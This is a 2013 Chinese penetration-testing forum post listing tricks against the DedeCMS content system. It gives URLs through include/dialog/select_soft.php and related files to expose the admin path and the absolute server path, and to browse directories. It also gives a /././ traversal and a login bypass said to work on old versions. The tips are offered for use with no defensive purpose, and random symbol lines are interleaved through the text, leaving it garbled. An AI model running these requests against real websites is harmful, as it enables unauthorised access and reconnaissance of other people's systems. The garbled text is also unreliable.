中国网络渗透测试联盟
标题:
dedecms爆后台文件技巧
[打印本页]
作者:
admin
时间:
2013-4-16 16:50
标题:
dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
* W o% I. G3 e6 e8 ^
+ j4 Q% `4 E- ?' i
员帐号,新版本的就直接转向了后台.
) D( o9 Q: i% r! b
& m0 m8 r) I4 n8 h$ H+ \
2.include/dialog/config.php会爆出后台管理路径
, ?) u6 w" q8 i' _, X- G5 R
1 f- I& n7 f4 Q4 m' F" F& |8 T
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
( {+ S& _$ s6 N$ @
* l7 Q6 f+ q% [" D9 G
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
8 O4 _. _4 X3 I3 @1 _( k% L
- N: w& D H$ E `
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
0 X& z( k5 T! I. B5 \
7 M( P! @3 P* @
到根目录去.不过这些版本的访问地址有些不同.
: d% m* T/ Y7 G
地址为require/dialog/select_soft.php?activepath=/././././././././
4 d9 o0 h' Y! x0 }" p# p) _- j
' ^4 |9 j% X2 j4 h0 ~1 O+ \+ p P2 A7 _/ L
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
8 D! D/ [- J) B: }+ i5 v& {" Q H" L
存在相同问题的文件还有
: ^5 f+ u3 v9 F- d
include\dialog\select_images.php
# _5 A M% U3 k
include\dialog\select_media.php
" B3 u# ?+ @' l) {* z* o4 ~
include\dialog\select_templets.php
, \ W' D! m) N) B
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2